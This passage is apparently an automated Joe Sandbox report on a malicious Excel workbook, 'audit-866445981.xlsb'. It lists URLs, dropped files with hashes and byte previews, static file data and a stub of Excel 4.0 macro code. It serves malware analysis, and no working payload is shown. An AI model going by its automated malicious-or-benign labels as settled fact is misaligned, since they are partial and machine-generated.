                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorizeEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.aiEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://loki.delve.office.com/api/v1/configuration/officewin32/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    No contacted IP infos

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                    Analysis ID:433270
                                                                                                                                                    Start date:11.06.2021
                                                                                                                                                    Start time:15:02:52
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 31s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:audit-866445981.xlsb
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Number of analysed new started processes analysed:20
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal68.expl.evad.winXLSB@7/10@0/0
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsb
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 168.61.161.212, 13.64.90.137, 13.88.21.125, 104.43.139.144, 52.109.76.68, 52.109.8.22, 20.50.102.62, 92.122.213.247, 92.122.213.194, 20.54.7.98, 20.54.104.15, 20.54.26.129, 20.82.209.183
                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    15:03:50API Interceptor1162x Sleep call for process: splwow64.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    No context

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    No context

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\EB5EB814-F278-44A1-A618-8F2C364FB0C1
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):134922
                                                                                                                                                    Entropy (8bit):5.3691112587971155
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:QcQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:4EQ9DQW+ziXOe
                                                                                                                                                    MD5:C7D95D325272508ED3E1E68923363114
                                                                                                                                                    SHA1:C1DD969592778CDB77E55DE51D37987FD18EC587
                                                                                                                                                    SHA-256:56F6249B1A4E7E0CB08F4E01E06DF59A829B8FD49554ABC93DBEFF3C697441A2
                                                                                                                                                    SHA-512:37D9268050E49F97DC79C9D2E985E50FA53F1DF3511ADB7E8B460032A939CF71FE252F00091BC2021F2102D15578648A7BAC4822CEFB14D08E92AB78DD01E48A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-11T13:03:47">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\266B3397.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):557
                                                                                                                                                    Entropy (8bit):7.343009301479381
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                    MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                    SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                    SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                    SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\617A426E.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 521 x 246, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):32996
                                                                                                                                                    Entropy (8bit):7.975478139053759
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:N4k48AnTViUidx37OODgvnrxtxAudMN1VTRVHdB4K7K:NE8m+L37OOwrCXN1VTR1PK
                                                                                                                                                    MD5:4E69B72B0CE87CC7EE30AA1A062147FE
                                                                                                                                                    SHA1:09B0AA5414E08756E0AE53E1BE5C70DB4DEAF2E8
                                                                                                                                                    SHA-256:77A1F749389CBF771D5197FF0FF17113FCA1D91989ADCADF2852876A6CC14988
                                                                                                                                                    SHA-512:6246AF2137E773F7719033AFE75F0B00FF3A4B5543DBA53737FC8D33EE42478E3D8A5CF166E9EFD2F54A2F3E0D62417BDDC1CB824642305B59AB1229313D2D79
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR..............[.J....sRGB.........pHYs..........+......IDATx^.].`......{%.$..A...R.P@z....O...S.<;.VT.REA.(...I...{.......m...]..r./.......~.|]h.Z....P.(........E."@...P.(.v.P.@..E."@....#@y.......E."@y.......E."...*78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x..
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\92C9AF9A.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 934 x 29, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):42557
                                                                                                                                                    Entropy (8bit):7.992800895943226
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:768:Pfsq4UmepRdblCFcXhw9KnRTRews6xD0FvBlwAS1A8x7BcS0OvD230:PR3ZblCF28KRsws6CFv0AYx7Bl3b230
                                                                                                                                                    MD5:B1F262A694930ADB699FA94E3394887F
                                                                                                                                                    SHA1:9C9B66D3A3F09AECA45DB94304CDD6FB3C5BD4C9
                                                                                                                                                    SHA-256:9C99EC61392B9022A38C1354124360147E8185065095BD2EC92B1416CF9F4B68
                                                                                                                                                    SHA-512:1CA7E6750178B88EC3AA7A0B83348EA389E26C27E0D7E919D807BE470714E5B4F04ACEB69D391F0498D4E465E6620E9449CA2F40755B5CE8196E683502EBF5F4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.............6......sRGB.........pHYs..........+......IDATx^....dU....S.:ON.0.0....s0 .....$..%#HR.T.......$..0C...Su...[.TM..{.......C.S}..^{......].^..ZX.Wb.W....X!..A.P....0..u...X.V.3.....z..tiO{GW..?...A.......ca2Y.... ...cAX..zZ..2M.$..g.O.e..r?z&................*....*.=..Z.A........a.Z..ka<..N.R.c......./.[..j.^...Nk.(..y.,..z"...R..Z+..D1Q....z....0..u~..jU_.b.Z.V....:..5:.(.......-...A2.O.{..p.j..].<........0..0..+...E...^...z....#..j.d...X._..1..M.5..O.^.."..l....G....U1........X.6.Z.\.&..h..m*..T..xH.j..3<$.H...a..n....}t.A.jT.6G.h@..<.x..x...cb......C..{.D.'QW<.o~..?.....4F_..B..h.\...y8..)....j.Z.d..#P..P..O.....(.0...f....B_z>.E .w../..(...'.Fw..yT..G..)...b9..g.AA`.a..v.zfY.F........._r.i.d.`....Q.g.m"..\..&.t.X.q1}.$.S....2..~...d."..1.. (.0.F....t...i..@f.. ...(..8..q.....I.....ad.....z%....;...y.O...X<Q..X.....B..H........<)....4.&9.4......1.h..#B.....g.....bO.59.A..M.....J..vX3*5..X....(G.A.u...8.. .{
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B3BEC8AC.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):848
                                                                                                                                                    Entropy (8bit):7.595467031611744
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                    MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                    SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                    SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                    SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BD70B8BD.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 246 x 108, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):10270
                                                                                                                                                    Entropy (8bit):7.975714699744477
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:3sXvKLMbye/PEXiKTUgCto9h4F6NwfU6vGDpdYNbcQZgkbd4cgc:3iLh/gJ59CDfU6LocbGK
                                                                                                                                                    MD5:9C4F09E387EA7B36C8149EA7C5F8876E
                                                                                                                                                    SHA1:FF83384288EB89964C3872367E43F25FAFF007CC
                                                                                                                                                    SHA-256:A51C1D65092272DAEB2541D64A10539F0D04BC2F51B281C7A3296500CFCA56DE
                                                                                                                                                    SHA-512:0FDDE22CFDDE8BB1C04842D2810D0FD6D42192594E0D6120DE401B08B7E2CFFB5333792BC748E93CD70FA14734CC7D950620CB977DDBBDB52D92BDA8F35521F8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .PNG........IHDR.......l...........sRGB.........pHYs..........+....'.IDATx^.].|.U...%...J.".....H.&Ui......E.........D.7....U.i..FH#=......3..$K....'{3....7........0.H......H..03..,....8.q........'@\...S@.../.0=....|....}|......0.... ...,LO........q._`az.....8......... .`..) @...X...q..>N...>.........q........'@\...S@.../.0=....|....}|......0.... ...,LO........q._`az.....8...l..m.i'Sj.W.i.S.TJ....D.D._%...]..i.;J..b..T.).Ik.L6..L.mN....!*..\..'{$.o._b..h....t"@.?...y...d..h..|..B9D..CJD..t."........bR"....I)H....z.......>|.....E.x..r....J.U..[...p:D....XF......A...E.....b..C...C..C......=.Z..$.=../....Y..x5CY.0l..,~.W. .?......;...$.'....<.H.2...z..6(.E........kw8w^.\~...".C,gl&.m..J2.).HI.....b.r...'.....r.H...P.....'...A.^.q..j).cZ.^1~.|.........dv^.^v..X..v..6/^.$rR. iK..H.Uu.Pvk....U.....'.Fd..Z.]mu\*1.Zb.\b...N..P..&tr;.W....J.K(@.^A..R.S.[~.v.R.YO...0-...2..h."..............7..Ng...R...e.&..@..t..N...{5...W.x./#.%..}t...F8-..M1..(4b1....&.....)B...6.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F63F46D3.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 490 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):18547
                                                                                                                                                    Entropy (8bit):7.9850486438978985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:kBCIQCloAwCZDy0xOTn6/g6l4NpWfw9nHk6Ka01f7Y/H:kBCIQpAwODPMT6/gfOUKN70
                                                                                                                                                    MD5:ED31C7053D581EDC4C98D222CE02EDEF
                                                                                                                                                    SHA1:6BA7A49CC6FF8FE00E9C5BC75F48AB7E679536DD
                                                                                                                                                    SHA-256:0FCF61397154DF01CFAECA362BD643D88AAD5FEDD07B52DC8A921CC0D7236534
                                                                                                                                                    SHA-512:929BF13F2A050B33D0EABDAC97CAAFDDE612AD521027FEE4DD51E28A3CF61198D6C045E00AB85223C73D74D18BB4EAA1681C7AFA917946DC08A3C75FB2AB4935
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .PNG........IHDR.............l{......sRGB.........pHYs..........+....H.IDATx^...U............"x....U...."...Tc.{...M1M..In....TATb4F,`oD..Q..3......g.3..Lr.D....a8....~.z....Z...yyF..9...:.H.Q2..)/L.....Q.}....(J..,...w2>R.$..G2..m>..|...0.M.g.Xnjj...P.v..x....S......B..p.=.Lz.^..Wi..2U.V'.a..*DE.'..rT.z....#.;..]....[?.C...o.m`]..m][;.:<..]F.9..u..Q]c.Ue.9....(.F.Z.~s..Q:..B...)..LZ.TTo..P.gc.l.'.X.}..H....Q.h|....L..rcd.2dN..co..5.....w.U.4..}........{.Q.....D2.J.z~..:Y3,.H..(#.J.Q......N.._7....w.....].2w.6...._....u.......9-.7.f9...E9...p.A..f....=....Bqu....A.u.JG>b"...%..0..W.H=...G#.DR.....P.|FD).NJ....)>.;...M...T*.dW..t:[.xT..M.|S...O..."M.4u7.uS...]4..R.vK....*).ZK.. J.=.9C.].kr..ES..6..f.(.....N':..t..^.S....kn[s.#..(.....m.....~....6>....:u.J.mO.....%D...Q...6%....!......H.....v..^%....$.._..V........[o5.H8......n.~M.z.RL.0p:.iC.k.1..$...............3[....mS5..........E...2.&...k]...A.....K.8...5..O.@7.[-.F4*7...i....in...y....A
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\16E40000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):159443
                                                                                                                                                    Entropy (8bit):7.962639561943536
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:y89VlUBWA6CFvA7brCxAVIKuSkmxVymd1xXP8lTkdm3bGeAxilFz:y83liWA6FiYpxVyWxf8lTkeGKf
                                                                                                                                                    MD5:BDF789CD1364BE8F1488716F3583AFD0
                                                                                                                                                    SHA1:5418B8AFC1AD0A751F7F88CC1E92A3297116748C
                                                                                                                                                    SHA-256:6324864DC24DBF7F25C5200B1676B69C71DACD3DAA277BBDA61FB87EA1E555E8
                                                                                                                                                    SHA-512:5D3DD1BD9B6C6C0C2DE036AE70D4EBA8A6885B8138537C12C86B58888D132129AD248A8C7365592558A7BE8346B355CB1D0E0A88B35E0A93514049DADB714F74
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .U.n.0....?......(..r.mzl.$...\K....I..V.6Pl.6.^.....v.7.k.'...k.U3c.8.v].~=|.?...pJ..e[@v.x.n.....E;lY.R..9......pt...D...A.._.f.....Ku..l1..+.hRu...;%K.X.u._.j...h)...ON."..j.%(/.-A7."..=@...Q.c...(1d|.3.....Ys.>....4....E.T...?.Yo0.}..~R..VP..~.Kn...>..... .L.5l$..8.X!..ubi..v/..0.H..vu..Mr.~9..<Q....Q.....3'...C...r$.Q.Sr. ..)]6).DC.x...W.........=....>.....o.#:T..Y.....}.:.K......."Lw.e...:...a?[.&..v.......n^...7.......PK..........!..:......m.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22
                                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                    C:\Users\user\Desktop\~$audit-866445981.xlsb
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.955290462322502
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                    • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                    File name:audit-866445981.xlsb
                                                                                                                                                    File size:158780
                                                                                                                                                    MD5:e1fdc1cf780e50ec43eee2ee43dfc730
                                                                                                                                                    SHA1:2de4c0600e360e355cc2c26ffcfc5f378bf20db4
                                                                                                                                                    SHA256:aacfdf7e9a3ec72b953c651bfc27e7d84c46b8656170867eca64a7a09d8d1bcd
                                                                                                                                                    SHA512:baed5a7c7600b9845f722b4c3d0a80902bf9b111c9d3bd324c1b33bbf57e338358d648e8a291a772425509fa3e9272ec0cae4918e26e05e5375d82b4b75d6171
                                                                                                                                                    SSDEEP:3072:7tbU9VlUBWA6CFvA7bRCxAVIK2xVymd1xXP+Ph9vajtC1gBbZP6i:hU3liWA6FsY2xVyWxf+QegBbd
                                                                                                                                                    File Content Preview:PK..........!.^.~.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "audit-866445981.xlsb"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
